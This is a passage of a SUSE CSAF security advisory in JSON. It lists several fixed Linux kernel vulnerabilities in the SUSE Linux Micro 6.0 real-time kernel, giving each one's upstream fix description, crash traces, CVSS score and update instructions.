"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68365"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68374",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68374"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix rcu protection in md_wakeup_thread\n\nWe attempted to use RCU to protect the pointer \u0027thread\u0027, but directly\npassed the value when calling md_wakeup_thread(). This means that the\nRCU pointer has been acquired before rcu_read_lock(), which renders\nrcu_read_lock() ineffective and could lead to a use-after-free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68374",
"url": "https://www.suse.com/security/cve/CVE-2025-68374"
},
{
"category": "external",
"summary": "SUSE Bug 1255530 for CVE-2025-68374",
"url": "https://bugzilla.suse.com/1255530"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68374"
},
{
"cve": "CVE-2025-68378",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68378"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix stackmap overflow check in __bpf_get_stackid()\n\nSyzkaller reported a KASAN slab-out-of-bounds write in __bpf_get_stackid()\nwhen copying stack trace data. The issue occurs when the perf trace\n contains more stack entries than the stack map bucket can hold,\n leading to an out-of-bounds write in the bucket\u0027s data array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68378",
"url": "https://www.suse.com/security/cve/CVE-2025-68378"
},
{
"category": "external",
"summary": "SUSE Bug 1255614 for CVE-2025-68378",
"url": "https://bugzilla.suse.com/1255614"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68378"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68380",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68380"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix peer HE MCS assignment\n\nIn ath11k_wmi_send_peer_assoc_cmd(), peer\u0027s transmit MCS is sent to\nfirmware as receive MCS while peer\u0027s receive MCS sent as transmit MCS,\nwhich goes against firmwire\u0027s definition.\n\nWhile connecting to a misbehaved AP that advertises 0xffff (meaning not\nsupported) for 160 MHz transmit MCS map, firmware crashes due to 0xffff\nis assigned to he_mcs-\u003erx_mcs_set field.\n\n\tExt Tag: HE Capabilities\n\t [...]\n\t Supported HE-MCS and NSS Set\n\t\t[...]\n\t Rx and Tx MCS Maps 160 MHz\n\t\t [...]\n\t Tx HE-MCS Map 160 MHz: 0xffff\n\nSwap the assignment to fix this issue.\n\nAs the HE rate control mask is meant to limit our own transmit MCS, it\nneeds to go via he_mcs-\u003erx_mcs_set field. With the aforementioned swapping\ndone, change is needed as well to apply it to the peer\u0027s receive MCS.\n\nTested-on: WCN6855 hw2.1 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68380",
"url": "https://www.suse.com/security/cve/CVE-2025-68380"
},
{
"category": "external",
"summary": "SUSE Bug 1255580 for CVE-2025-68380",
"url": "https://bugzilla.suse.com/1255580"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68380"
},
{
"cve": "CVE-2025-68724",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68724"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id\n\nUse check_add_overflow() to guard against potential integer overflows\nwhen adding the binary blob lengths and the size of an asymmetric_key_id\nstructure and return ERR_PTR(-EOVERFLOW) accordingly. This prevents a\npossible buffer overflow when copying data from potentially malicious\nX.509 certificate fields that can be arbitrarily large, such as ASN.1\nINTEGER serial numbers, issuer names, etc.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68724",
"url": "https://www.suse.com/security/cve/CVE-2025-68724"
},
{
"category": "external",
"summary": "SUSE Bug 1255550 for CVE-2025-68724",
"url": "https://bugzilla.suse.com/1255550"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68724"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
